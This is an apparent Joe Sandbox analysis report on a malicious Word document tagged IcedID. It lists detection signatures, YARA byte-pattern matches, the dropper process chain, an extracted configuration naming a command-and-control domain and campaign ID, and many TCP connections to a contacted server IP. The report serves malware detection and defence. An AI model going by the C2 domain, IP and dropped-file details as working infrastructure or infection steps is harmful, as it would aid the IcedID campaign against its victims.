Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
dodsonimaging,file,08.11.2022.doc

Overview

General Information

Sample Name:dodsonimaging,file,08.11.2022.doc
Analysis ID:682555
MD5:db11828aed458eccfab30c367bc1bb2f
SHA1:3487931f130485c82d21e9ef4155af0a8fd46c33
SHA256:d297f78ca4fc35e899792260c98f752947f7d6b5999650a6210f4a8538a2e655
Tags:docIcedID
Infos:

Detection

IcedID
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Document exploit detected (drops PE files)
Malicious sample detected (through community Yara rule)
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
System process connects to network (likely due to code injection or exploit)
Document exploit detected (creates forbidden files)
Antivirus detection for dropped file
Yara detected IcedID
Submitted sample is a known malware sample
Office process drops PE file
Machine Learning detection for sample
Document contains an embedded VBA macro with suspicious strings
Tries to detect virtualization through RDTSC time measurements
C2 URLs / IPs found in malware configuration
Document exploit detected (process start blacklist hit)
Contains functionality to detect hardware virtualization (CPUID execution measurement)
Yara signature match
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
Potential document exploit detected (performs DNS queries)
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Downloads executable code via HTTP
Contains functionality for execution timing, often used to detect debuggers
Document misses a certain OLE stream usually present in this Microsoft Office document type
PE file does not import any functions
Potential document exploit detected (unknown TCP traffic)
PE file contains an invalid checksum
PE file contains strange resources
Drops PE files
Uses a known web browser user agent for HTTP communication
Document contains embedded VBA macros
Dropped file seen in connection with other malware
Uses Microsoft's Enhanced Cryptographic Provider
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to query network adapater information
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w7x64
  • WINWORD.EXE (PID: 1232 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
    • r8F8A.tmp.exe (PID: 1364 cmdline: "C:\Users\user\AppData\Local\Temp\r8F8A.tmp.exe" "C:\Users\user\AppData\Local\Temp\y84FE.tmp.dll",#1 MD5: 51138BEEA3E2C21EC44D0932C71762A8)
      • rundll32.exe (PID: 1552 cmdline: "C:\Users\user\AppData\Local\Temp\r8F8A.tmp.exe" "C:\Users\user\AppData\Local\Temp\y84FE.tmp.dll",#1 MD5: DD81D91FF3B0763C392422865C9AC12E)
  • cleanup

Malware Configuration

Threatname: IcedID

{"Campaign ID": 3570055661, "C2 url": "alexbionka.com"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000005.00000002.946706838.0000000180001000.00000020.00001000.00020000.00000000.sdmpWindows_Trojan_IcedID_0b62e783unknownunknown
  • 0x876:$a: 89 44 95 E0 83 E0 07 8A C8 42 8B 44 85 E0 D3 C8 FF C0 42 89 44
00000005.00000002.946706838.0000000180001000.00000020.00001000.00020000.00000000.sdmpWindows_Trojan_IcedID_91562d18unknownunknown
  • 0x1bc4:$a: 44 8B 4C 19 2C 4C 03 D6 74 1C 4D 85 C0 74 17 4D 85 C9 74 12 41
00000005.00000002.946706838.0000000180001000.00000020.00001000.00020000.00000000.sdmpWindows_Trojan_IcedID_48029e37unknownunknown
  • 0x1190:$a: 48 C1 E3 10 0F 31 48 C1 E2 20 48 0B C2 0F B7 C8 48 0B D9 8B CB 83 E1
00000005.00000002.946709887.0000000180004000.00000002.00001000.00020000.00000000.sdmpWindows_Trojan_IcedID_11d24d35unknownunknown
  • 0x3d0:$a2: loader_dll_64.dll
00000005.00000002.946534785.000000000045E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_IcedID_6Yara detected IcedIDJoe Security
    Click to see the 7 entries

    Unpacked PEs

    SourceRuleDescriptionAuthorStrings
    5.2.rundll32.exe.180000000.1.unpackMAL_IcedID_GZIP_LDR_2021042021 initial Bokbot / Icedid loader for fake GZIP payloadsThomas Barabosch, Telekom Security
    • 0x27d0:$internal_name: loader_dll_64.dll
    • 0x3198:$string0: _gat=
    • 0x3048:$string1: _ga=
    • 0x30a0:$string2: _gid=
    • 0x3118:$string3: _u=
    • 0x303a:$string4: _io=
    • 0x3054:$string5: GetAdaptersInfo
    • 0x2b08:$string6: WINHTTP.dll
    • 0x27f4:$string7: DllRegisterServer
    • 0x2806:$string8: PluginInit
    • 0x3134:$string9: POST
    5.2.rundll32.exe.180000000.1.unpackJoeSecurity_IcedID_6Yara detected IcedIDJoe Security
      5.2.rundll32.exe.180000000.1.unpackMALWARE_Win_IceIDDetects IceID / Bokbot variantsditekSHen
      • 0x3134:$n1: POST
      • 0x3194:$n2: ; _gat=
      • 0x3044:$n3: ; _ga=
      • 0x3114:$n4: ; _u=
      • 0x3034:$n5: ; __io=
      • 0x309c:$n6: ; _gid=
      • 0x316c:$n7: Cookie: __gads=
      • 0x30f4:$s1: c:\ProgramData
      • 0x27d0:$s2: loader_dll_64.dll
      5.2.rundll32.exe.180000000.1.unpackWindows_Trojan_IcedID_11d24d35unknownunknown
      • 0x27d0:$a2: loader_dll_64.dll
      5.2.rundll32.exe.180000000.1.unpackWindows_Trojan_IcedID_0b62e783unknownunknown
      • 0xc76:$a: 89 44 95 E0 83 E0 07 8A C8 42 8B 44 85 E0 D3 C8 FF C0 42 89 44
      Click to see the 14 entries

      Sigma Signatures

      No Sigma rule has matched

      Snort Signatures

      No Snort rule has matched

      Joe Sandbox Signatures

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Multi AV Scanner detection for submitted file
      Source: dodsonimaging,file,08.11.2022.docVirustotal: Detection: 26%Perma Link
      Antivirus detection for dropped file
      Source: C:\Users\user\AppData\Local\Temp\y84FE.tmp.dllAvira: detection malicious, Label: HEUR/AGEN.1251556
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\loader_p3_dll_64_n3_crypt_x64_asm_clone_n152[1].dllAvira: detection malicious, Label: HEUR/AGEN.1251556
      Yara detected IcedID
      Source: Yara matchFile source: 5.2.rundll32.exe.46ab18.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 00000005.00000002.946534785.000000000045E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 1552, type: MEMORYSTR
      Source: Yara matchFile source: 5.2.rundll32.exe.180000000.1.unpack, type: UNPACKEDPE
      Machine Learning detection for sample
      Source: dodsonimaging,file,08.11.2022.docJoe Sandbox ML: detected
      Source: 00000005.00000002.946534785.000000000045E000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: IcedID {"Campaign ID": 3570055661, "C2 url": "alexbionka.com"}
      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000007FEF74D2CCA CryptCreateHash,5_2_000007FEF74D2CCA
      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000007FEF74D2CDA CryptCreateHash,5_2_000007FEF74D2CDA
      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000007FEF74D2CF7 CryptCreateHash,CryptAcquireContextW,5_2_000007FEF74D2CF7
      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000007FEF74D2CCA CryptCreateHash,5_2_000007FEF74D2CCA
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
      Source: Binary string: rundll32.pdb source: r8F8A.tmp.exe, r8F8A.tmp.exe, 00000004.00000000.924645726.0000000000041000.00000020.00000001.01000000.00000003.sdmp, r8F8A.tmp.exe, 00000004.00000002.947175300.0000000000041000.00000020.00000001.01000000.00000003.sdmp, r8F8A.tmp.exe.0.dr

      Software Vulnerabilities

      barindex
      Document exploit detected (drops PE files)
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: loader_p3_dll_64_n3_crypt_x64_asm_clone_n152[1].dll.0.drJump to dropped file
      Document exploit detected (creates forbidden files)
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\loader_p3_dll_64_n3_crypt_x64_asm_clone_n152[1].dllJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\y84FE.tmp.dllJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\r8F8A.tmp.exeJump to behavior
      Document exploit detected (process start blacklist hit)
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Users\user\AppData\Local\Temp\r8F8A.tmp.exe
      Source: global trafficDNS query: name: alexbionka.com
      Source: global trafficDNS query: name: alexbionka.com
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
